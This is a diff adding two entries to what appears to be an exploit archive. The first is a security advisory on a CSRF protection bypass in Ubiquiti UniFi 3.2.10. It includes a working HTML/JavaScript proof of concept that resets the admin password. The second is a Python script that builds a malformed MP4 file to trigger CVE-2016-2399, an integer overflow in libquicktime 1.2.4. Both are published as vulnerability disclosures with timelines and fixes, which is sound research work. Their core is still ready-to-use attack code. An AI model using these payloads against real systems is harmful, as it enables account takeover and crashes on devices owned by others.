diff --git a/files.csv b/files.csv
index 49020e8fd..2fe630d53 100755
--- a/files.csv
+++ b/files.csv
@@ -35723,3 +35723,5 @@ id,file,description,date,author,platform,type,port
 39483,platforms/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
 39484,platforms/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
 39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80
+39487,platforms/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos,0
+39488,platforms/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - CSRF Vulnerability",2016-02-23,"Julien Ahrens",json,webapps,8443
diff --git a/platforms/json/webapps/39488.txt b/platforms/json/webapps/39488.txt
new file mode 100755
index 000000000..047a40a55
--- /dev/null
+++ b/platforms/json/webapps/39488.txt
@@ -0,0 +1,104 @@
+RCE Security Advisory
+https://www.rcesecurity.com
+ 
+ 
+1. ADVISORY INFORMATION
+-----------------------
+Product:        Ubiquiti Networks UniFi
+Vendor URL:     www.ubnt.com
+Type:           Cross-Site Request Forgery [CWE-353]
+Date found:     2015-03-19
+Date published: 2016-02-23
+CVSSv3 Score:   6.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)
+CVE:            -
+ 
+ 
+2. CREDITS
+----------
+This vulnerability was discovered and researched by Julien Ahrens from
+RCE Security.
+ 
+ 
+3. VERSIONS AFFECTED
+--------------------
+UniFi v3.2.10
+older versions may be affected too.
+
+
+4. INTRODUCTION
+---------------
+The UniFi® Controller software is a powerful, enterprise wireless software 
+engine ideal for high-density client deployments requiring low latency and 
+high uptime performance. A single UniFi Controller running in the cloud 
+can manage multiple sites: multiple, distributed deployments and 
+multi-tenancy for managed service providers.
+
+(from the vendor's homepage)
+ 
+ 
+5. VULNERABILITY DESCRIPTION
+----------------------------
+A generic Cross-Site Request Forgery protection bypass vulnerability was
+identified in UniFi v3.2.10 and prior.
+ 
+The application uses a CSRF protection, which is based on verifying the
+Referer header, but does not catch the case where the Referer header
+is completely missing. 
+ 
+This leads to a generic CSRF protection bypass, resulting in all 
+application specific functionalities becoming vulnerable. An attacker needs 
+to trick the victim to visit an arbitrary website in order to exploit the 
+vulnerability. Successful exploits can allow the attacker to compromise the
+whole application including connected devices, e.g. by changing passwords
+of users, adding new users, changing device usernames and passwords or by 
+creating new WLAN configurations.
+ 
+ 
+6. PROOF-OF-CONCEPT
+-------------------
+The following PoC changes the password of the user "admin" to "csrfpwd":
+
+<html>
+<head>
+<script>
+function load() {
+    var postdata = '<form id=csrf method=POST enctype=\'text\/plain\' action=\'https://127.0.0.1:8443/api/s/default/cmd/sitemgr\'>' +
+                    '<input type=hidden name=\'json=%7B%22name%22%3A%22admin%22%2C%22x_password%22%3A%22csrfpwd%22%2C%22email%22%3A%22info%40mail.com%22%2C%22lang%22%3A%22en_US%22%2C%22cmd%22%3A%22set-self%22%7D\' value=\'\' />' +
+                    '</form>';
+    top.frames[0].document.body.innerHTML=postdata;
+    top.frames[0].document.getElementById('csrf').submit();
+}
+</script>
+</head>
+<body onload="load()">
+<iframe src="about:blank" id="noreferer">< /iframe>
+</body>
+</html>
+ 
+ 
+7. SOLUTION
+-----------
+Upgrade to UniFi v4.7.5 or later
+ 
+ 
+8. REPORT TIMELINE
+------------------
+2015-03-19: Discovery of the vulnerability
+2015-03-10: Reported via Ubiquiti's Bug Bounty program (hackerone.com)
+2015-06-02: Vendor apologizes his backlog
+2015-09-28: Asking for status update via HackerOne 
+2015-09-28: Vendor asks to test against version 4.7.5
+2015-10-02: Verified working fix for v4.7.5
+2015-10-23: Vendor changes status to "Resolved"
+2015-11-24: Asking for coordinated disclosure via email
+2015-12-08: No response from vendor
+2015-12-08: Requested public disclosure on HackerOne
+2016-01-08: Report is published automatically
+2016-02-23: Advisory released
+ 
+ 
+9. REFERENCES
+-------------
+https://www.rcesecurity.com/2016/02/ubiquiti-bug-bounty-unifi-v3-2-10-generic-csrf-protection-bypass
+https://hackerone.com/reports/52635
+
diff --git a/platforms/multiple/dos/39487.py b/platforms/multiple/dos/39487.py
new file mode 100755
index 000000000..8b6cdd0f2
--- /dev/null
+++ b/platforms/multiple/dos/39487.py
@@ -0,0 +1,105 @@
+#!/usr/bin/env python
+#
+###
+# - 7 February 2016 -
+# My last bug hunting session (*for fun and no-profit*) 
+# has been dedicated to libquicktime
+###
+# 
+# Author: Marco Romano - @nemux_ http://www.nemux.org
+# libquicktime 1.2.4 Integer Overflow
+#
+# Product Page: http://libquicktime.sourceforge.net/
+# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
+# Affected products: All products using libquicktime version <= 1.2.4
+#
+# CVE-ID: CVE-2016-2399 
+#
+# Disclosure part: http://www.nemux.org
+#
+########
+####### Timeline
+#
+# 07 Feb 2016 Bug discovered
+# 17 Feb 2016 Mitre.org contacted
+# 17 Feb 2016 Disclosed to the project's maintainer
+# 23 Feb 2016 No response from the maintainer
+# 23 Feb 2016 Publicly disclosed 
+#
+########
+####### References
+#
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399
+# http://libquicktime.sourceforge.net/
+# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html 
+# https://en.wikipedia.org/wiki/QuickTime\_File\_Format
+#
+#######
+#
+# DISCLAIMER: It's just a PoC... it will crash something
+#
+#### 
+import sys
+import struct
+import binascii
+
+"""
+There needs to be an mp4 file with these nested atoms to trigger the bug:
+moov -> trak -> mdia -> hdlr
+"""
+hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1" 
+             "6D6F6F76"               #### moov atom
+             "0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000"
+             "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000" 
+             "00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175"
+             "7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000"
+             "0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000" 
+             "00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000" 
+             "000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF" 
+             "616C626D000000000000FEFF0000010000000E79727263000000000000000002E4"
+             "7472616B"               #### trak atom
+             "0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000"
+             "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040"
+             "6D646961"               #### mdia atom
+             "000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000"
+             "4E"                     #### hdlr atom length
+             "68646C72"               #### hdlr atom
+             "0000000000"
+             "4141414141414141"       #### our airstrip :)
+             "0000000000000000000000" 
+             "EC"                     #### 236 > 127 <-- overflow here and a change in signedness too
+             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010")
+
+hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))
+
+def createPoC():
+    try:
+        with open("./nemux.mp4","wb") as output:
+            output.write(hax0r_mp4)
+        print "[*] The PoC is done!"
+    except Exception,e: 
+        print str(e)
+        print "[*] mmmm!"
+
+def usage():
+    print "\nUsage? Run it -> " + sys.argv[0]
+    print "this poc creates an mp4 file named nemux.mp4"
+    print "--------------------------------------------"
+    print "This dummy help? " + sys.argv[0] + " help\n" 
+    sys.exit()
+
+if __name__ == "__main__":
+    try:
+        if len(sys.argv) == 2:
+            usage()
+        else:
+            print "\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n"
+            print "Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n";
+            createPoC();
+    except Exception,e: 
+        print str(e)
+        print "Ok... Something went wrong..."
+        sys.exit()
+
+
+
